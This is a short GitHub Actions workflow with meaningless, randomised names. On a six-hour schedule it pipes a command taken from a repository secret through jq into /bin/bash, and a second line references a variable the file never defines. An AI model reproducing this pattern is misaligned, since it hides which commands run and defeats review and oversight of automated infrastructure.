name: xuchunyan7651

on:
  workflow_dispatch:
  schedule:
    - cron: '6 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xuchunyan7651
        env:
          btkpy0: ${{ secrets.btkpy0 }}
        run: |
          echo $btkpy0 | jq -r .srpao4 | /bin/bash
          echo $rku2190 | jq -r .gaefj7359 | /bin/bash

